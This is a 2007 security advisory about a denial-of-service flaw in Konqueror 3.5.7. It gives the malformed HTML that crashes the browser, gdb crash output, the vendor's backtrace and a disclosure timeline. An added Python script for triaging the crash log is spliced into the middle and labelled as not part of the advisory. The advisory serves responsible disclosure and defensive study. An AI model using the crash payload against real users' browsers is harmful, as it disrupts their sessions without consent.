[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7
From: bugtraq () morph3us org
Date: 1 Aug 2007 19:20:20 -0000
---------------------------------------------------
| BuHa Security-Advisory #16 | Aug 01st, 2007 |
---------------------------------------------------
| Vendor | KDE's Konqueror |
| URL | http://www.konqueror.org/ |
| Version | <= 3.5.7 |
| Risk | Low (Denial Of Service) |
---------------------------------------------------
o Description:
=============
Konqueror is the file manager for the K Desktop Environment and an
Open Source web browser with HTML 4.01 compliance.
Visit http://www.konqueror.org/ for detailed information.
o Denial of Service:
===================
The following HTML code forces Konqueror to crash:
<textarea></button></textarea></br><bdo dir="">
<pre><frameset>
<a>
Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html
(gdb) set args konqueror.html
(gdb) r
Starting program: /usr/bin/konqueror konqueror.html
(no debugging symbols found)
[...]
[Thread debugging using libthread_db enabled]
[New Thread -1234381104 (LWP 5982)]
(no debugging symbols found)
[...]
Qt: gdb: -nograb added to command-line options.
Use the -dograb option to enforce grabbing.
X Error: BadDevice, invalid or uninitialized input device 169
Major opcode: 145
Minor opcode: 3
Resource id: 0x0
Failed to open device
X Error: BadDevice, invalid or uninitialized input device 169
Major opcode: 145
Minor opcode: 3
Resource id: 0x0
Failed to open device
(no debugging symbols found)
[...]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1234381104 (LWP 5982)]
0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.
I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
an assert and that, with the assert commented out, the backtrace ends in:
#6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
#7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
obj=0x0)
at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624
This issue does not seem to be exploitable.
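As an added triage aid (not part of the advisory, and not KDE code): a small Python parser over the gdb output quoted above that extracts the signal, the faulting module and every frame carrying a null `this` or null argument, which is the evidence behind the "not exploitable" assessment. Only the crash line and the two frames Dirk Mueller reported are embedded as sample input.

```python
import re

# Sample gdb output, copied from the advisory above (crash line plus the
# two backtrace frames reported by the vendor).
SAMPLE_LOG = """\
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1234381104 (LWP 5982)]
0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.
#6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
    at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
#7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
    obj=0x0)
    at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624
"""

SIGNAL_RE = re.compile(r"Program received signal (\w+)")
# "0xADDR in ?? () from /path/lib.so" (a trailing period, as in the
# advisory, is tolerated).
FAULT_RE = re.compile(r"^0x([0-9a-f]+) in (.+?) \(\) from (\S+?)\.?$", re.M)
# "#N 0xADDR in func (args) at file:line"; args may wrap onto the next line.
FRAME_RE = re.compile(
    r"^#(\d+)\s+0x[0-9a-f]+ in (\S+) \((.*?)\)\s+at (\S+):(\d+)", re.M | re.S)


def parse_frames(text):
    """Return the backtrace frames as dicts with func, args, file and line."""
    frames = []
    for m in FRAME_RE.finditer(text):
        raw_args = m.group(3).replace("\n", " ").split(",")
        args = dict(a.strip().split("=", 1) for a in raw_args if "=" in a)
        frames.append({"no": int(m.group(1)), "func": m.group(2), "args": args,
                       "file": m.group(4), "line": int(m.group(5))})
    return frames


def triage(text):
    """Classify a gdb crash log: signal, faulting module, null-pointer frames."""
    sig = SIGNAL_RE.search(text)
    fault = FAULT_RE.search(text)
    frames = parse_frames(text)
    null_args = [(f["func"], [k for k, v in f["args"].items() if v == "0x0"])
                 for f in frames if "0x0" in f["args"].values()]
    null_this = [f["func"] for f in frames if f["args"].get("this") == "0x0"]
    return {
        "signal": sig.group(1) if sig else None,
        "fault_pc": fault.group(1) if fault else None,
        "fault_module": fault.group(3) if fault else None,
        "null_this_frame": null_this[0] if null_this else None,
        "null_arg_frames": null_args,
        # A method invoked on this==0x0 reading a fixed offset is a plain
        # null dereference: a crash (DoS), not a controlled write.
        "likely_class": "null pointer dereference" if null_this else "unclassified",
    }
```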
o Disclosure Timeline:
=====================
03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.
o Solution:
==========
There is no solution yet. I assume the KDE developers will address this
bug in an upcoming KDE release.
o Credits:
=========
Thomas Waldegger <bugtraq () morph3us org>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq () morph3us org' is more a
spam address than a regular mail address; therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.
Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,
Rodnox, trappy and all members of BuHa.
Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt
[1] http://www.kde.org/info/security/
--
Don't you feel the power of CSS Layouts?
BuHa-Security Community: https://buha.info/board/